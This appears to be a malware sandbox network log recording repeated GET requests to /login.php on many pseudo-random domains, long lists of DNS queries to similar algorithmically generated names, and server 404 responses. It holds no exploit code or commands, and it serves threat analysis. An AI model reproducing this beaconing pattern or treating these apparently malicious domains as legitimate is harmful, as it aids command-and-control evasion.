    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731346399.2937263
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0433-4491-9018-901015a08e06 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731346399.2937263; parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478891988923922560
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478891988923922560
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficDNS traffic detected: DNS query: vonyzuf.com
    Source: global trafficDNS traffic detected: DNS query: lyvyxor.com
    Source: global trafficDNS traffic detected: DNS query: vojyqem.com
    Source: global trafficDNS traffic detected: DNS query: qetyfuv.com
    Source: global trafficDNS traffic detected: DNS query: lysyfyj.com
    Source: global trafficDNS traffic detected: DNS query: lyxywer.com
    Source: global trafficDNS traffic detected: DNS query: qegyqaq.com
    Source: global trafficDNS traffic detected: DNS query: gacyzuz.com
    Source: global trafficDNS traffic detected: DNS query: qeqyxov.com
    Source: global trafficDNS traffic detected: DNS query: puzywel.com
    Source: global trafficDNS traffic detected: DNS query: vofygum.com
    Source: global trafficDNS traffic detected: DNS query: gadyfuh.com
    Source: global trafficDNS traffic detected: DNS query: lymyxid.com
    Source: global trafficDNS traffic detected: DNS query: volyqat.com
    Source: global trafficDNS traffic detected: DNS query: qedyfyq.com
    Source: global trafficDNS traffic detected: DNS query: pumyxiv.com
    Source: global trafficDNS traffic detected: DNS query: galyqaz.com
    Source: global trafficDNS traffic detected: DNS query: gahyqah.com
    Source: global trafficDNS traffic detected: DNS query: vonypom.com
    Source: global trafficDNS traffic detected: DNS query: vojyjof.com
    Source: global trafficDNS traffic detected: DNS query: qetyvep.com
    Source: global trafficDNS traffic detected: DNS query: puvytuq.com
    Source: global trafficDNS traffic detected: DNS query: gahyhob.com
    Source: global trafficDNS traffic detected: DNS query: lyryvex.com
    Source: global trafficDNS traffic detected: DNS query: vocyruk.com
    Source: global trafficDNS traffic detected: DNS query: qegyhig.com
    Source: global trafficDNS traffic detected: DNS query: purycap.com
    Source: global trafficDNS traffic detected: DNS query: gacyryw.com
    Source: global trafficDNS traffic detected: DNS query: vowycac.com
    Source: global trafficDNS traffic detected: DNS query: qexyryl.com
    Source: global trafficDNS traffic detected: DNS query: pufygug.com
    Source: global trafficDNS traffic detected: DNS query: gatyfus.com
    Source: global trafficDNS traffic detected: DNS query: gaqycos.com
    Source: global trafficDNS traffic detected: DNS query: lygygin.com
    Source: global trafficDNS traffic detected: DNS query: galykes.com
    Source: global trafficDNS traffic detected: DNS query: vofymik.com
    Source: global trafficDNS traffic detected: DNS query: qekykev.com
    Source: global trafficDNS traffic detected: DNS query: qedynul.com
    Source: global trafficDNS traffic detected: DNS query: pumypog.com
    Source: global trafficDNS traffic detected: DNS query: volykyc.com
    Source: global trafficDNS traffic detected: DNS query: ganypih.com
    Source: global trafficDNS traffic detected: DNS query: lyvytuj.com
    Source: global trafficDNS traffic detected: DNS query: qebytiq.com
    Source: global trafficDNS traffic detected: DNS query: purydyv.com
    Source: global trafficDNS traffic detected: DNS query: qeqysag.com
    Source: global trafficDNS traffic detected: DNS query: lymysan.com
    Source: global trafficDNS traffic detected: DNS query: lysynur.com
    Source: global trafficDNS traffic detected: DNS query: vowydef.com
    Source: global trafficDNS traffic detected: DNS query: pupybul.com
    Source: global trafficDNS traffic detected: DNS query: puzylyp.com
    Source: global trafficDNS traffic detected: DNS query: gaqydeb.com
    Source: global trafficDNS traffic detected: DNS query: lyxylux.com
    Source: global trafficDNS traffic detected: DNS query: lyryfyd.com
    Source: global trafficDNS traffic detected: DNS query: qexylup.com
    Source: global trafficDNS traffic detected: DNS query: lygymoj.com
    Source: global trafficDNS traffic detected: DNS query: pujyjav.com
    Source: global trafficDNS traffic detected: DNS query: gatyvyz.com
    Source: global trafficDNS traffic detected: DNS query: pufymoq.com
    Source: global trafficDNS traffic detected: DNS query: vopybyt.com
    Source: global trafficDNS traffic detected: DNS query: vocyzit.com
    Source: global trafficDNS traffic detected: DNS query: qekyqop.com
    Source: global trafficDNS traffic detected: DNS query: lykyjad.com
    Source: global trafficDNS traffic detected: DNS query: puvyxil.com
    Source: global trafficDNS traffic detected: DNS query: gadyniw.com
    Source: global trafficDNS traffic detected: DNS query: www.gahyqah.com
    Source: global trafficDNS traffic detected: DNS query: pupydeq.com
    Source: global trafficDNS traffic detected: DNS query: ganyzub.com
    Source: global trafficDNS traffic detected: DNS query: lykymox.com
    Source: global trafficDNS traffic detected: DNS query: vopydek.com
    Source: global trafficDNS traffic detected: DNS query: qebylug.com
    Source: global trafficDNS traffic detected: DNS query: pujymip.com
    Source: global trafficDNS traffic detected: DNS query: lyvylyn.com
    Source: global trafficDNS traffic detected: DNS query: vojymic.com
    Source: global trafficDNS traffic detected: DNS query: gahynus.com
    Source: global trafficDNS traffic detected: DNS query: vocykem.com
    Source: global trafficDNS traffic detected: DNS query: vofybyf.com
    Source: global trafficDNS traffic detected: DNS query: puzyjoq.com
    Source: global trafficDNS traffic detected: DNS query: pufybyv.com
    Source: global trafficDNS traffic detected: DNS query: lymytux.com
    Source: global trafficDNS traffic detected: DNS query: lygynud.com
    Source: global trafficDNS traffic detected: DNS query: puzymig.com
    Source: global trafficDNS traffic detected: DNS query: vowypit.com
    Source: global trafficDNS traffic detected: DNS query: gacykeh.com
    Source: global trafficDNS traffic detected: DNS query: lyxyjaj.com
    Source: global trafficDNS traffic detected: DNS query: qexykaq.com
    Source: global trafficDNS traffic detected: DNS query: qegynuv.com
    Source: global trafficDNS traffic detected: DNS query: qeqytup.com
    Source: global trafficDNS traffic detected: DNS query: purypol.com
    Source: global trafficDNS traffic detected: DNS query: gadyveb.com
    Source: global trafficDNS traffic detected: DNS query: gaqypiz.com
    Source: global trafficDNS traffic detected: DNS query: volymum.com
    Source: global trafficDNS traffic detected: DNS query: lymylyr.com
    Source: global trafficDNS traffic detected: DNS query: qeqylyl.com
    Source: global trafficDNS traffic detected: DNS query: lyxymin.com
    Source: global trafficDNS traffic detected: DNS query: vofydac.com
    Source: global trafficDNS traffic detected: DNS query: gaqyzuw.com
    Source: global trafficDNS traffic detected: DNS query: pufydep.com
    Source: global trafficDNS traffic detected: DNS query: qexyqog.com
    Source: global trafficDNS traffic detected: DNS query: gadydas.com
    Source: global trafficDNS traffic detected: DNS query: lygyfex.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge6GOPmFxSV%2B%2BT1%2BTIQRK%2FQnxWhDhab5m1AReH97BZwIblOhjTwPxAQzqDYJi5Ikbxcxs638E8NKaGwhpmfZYd6iogWjk3EkTy5J3c4C7O9n1zIcGr9RLqJ5P%2F9thA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1006993f408c7b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1327&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=abb06ee54315933e&ts=1213&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1ljoVH9newXjkKfzem65efiD7VUtVQw%2FbOPYzPLMdSt23kXzF%2FtbIgmKTCAc5%2Byf7BXJTWTusSUla5Suuip030zDj1RXhKv3Hve%2FWLL8GYkQN466CylAvuCXjqaMw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1006a3fc2372aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=1353271&cwnd=239&unsent_bytes=0&cid=92f444a8342b0a08&ts=746&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="46.0",amp_style_sanitizer;dur="22.9",amp_tag_and_attribute_sanitizer;dur="17.1",amp_optimizer;dur="18.5"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLq82wRQNVpIHvzacho9ZxSgg61RbCRLrnTeOQFqm3ggFGC6zAzXo5Z91YrbZjKk1%2F55pZj1u%2FKvqZse03KhvuTA2iIoxJCOfALMc75RcMNLtEmy8jq8TdZ0U5S03A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1006b5795cafac-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=155429&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=18630&cwnd=32&unsent_bytes=0&cid=61270023507c636c&ts=1428&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="44.3",amp_style_sanitizer;dur="19.1",amp_tag_and_attribute_sanitizer;dur="21.1",amp_optimizer;dur="17.8"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMcpETkdI4nHjMXP%2FDrmQ5ifVjoPo%2F4xu2h4eC7%2B%2BAUvCToUV7HDPEkjlYWIsOmH%2FDbm%2BZDAVaxbrSlCoqfbVpUH7yR5xNh8fK5C4gMh4QOY39eAMnLSoWfelsnZeQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1006c97f804328-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2505190&cwnd=251&unsent_bytes=0&cid=bb0cb41164c0613d&ts=1421&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1p%2B3ek1m0cURCHenj1AiLsqvqVr%2Fh9sYjBQZbwcDOBqNdCTjR4bM1A0rYn%2B0OflXLyqGbNEBploXXZgeuX3zmF3k6AH%2FFyuMFRDMMnMHomnEhaiX%2FRUXpstnuAfuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e100739b8c80cac-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2061209&cwnd=249&unsent_bytes=0&cid=90ed1645990d313e&ts=995&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4XVVDvfTPVq9kVwA2OMG%2BQ7Wh3RxUu2n%2Fnbe1UvtKCbBUx%2BycbYrOslijTCCN3neabQx%2Bgsdwp5E1pi3VO15D5iIq8u4l1PduUpkkRrbWxnG5ImqbjDfH3mpBVGAjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e100744191c1921-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1293&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=15d0f1ed8208f477&ts=776&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="44.8",amp_style_sanitizer;dur="21.8",amp_tag_and_attribute_sanitizer;dur="17.6",amp_optimizer;dur="22.8"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQ%2BJ%2Bm8hfbFG1si9e3uB4EnLW%2Fk8IiSwdNLKuFf8m5kfNPwuodid%2FoheG3DpGI12BBbXMpa8EvxDTS9Jk8LDBR4RX%2FWmdnXsQjiX9jCqkuYdROSle9UDxpnd%2F%2BxRwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1007518df21906-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2533683&cwnd=236&unsent_bytes=0&cid=fcf2c50331b3e5db&ts=1519&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="44.1",amp_style_sanitizer;dur="21.7",amp_tag_and_attribute_sanitizer;dur="16.3",amp_optimizer;dur="22.3"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4jZP%2Bi4gO9cxDFlQTghfu8eZWQaOEn4J7YzW7gHt2sYZJJgatUxEa0cg3Tu0JD8%2F2hc635bqvIzijXW1Cj8pMACoiOAYEG5fj2hedUpXkoZvvzc8nvAStVTvhkz3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e100760285c36c3-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=12197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=236543&cwnd=76&unsent_bytes=0&cid=3e04c6c75e3a395b&ts=1506&x=0"
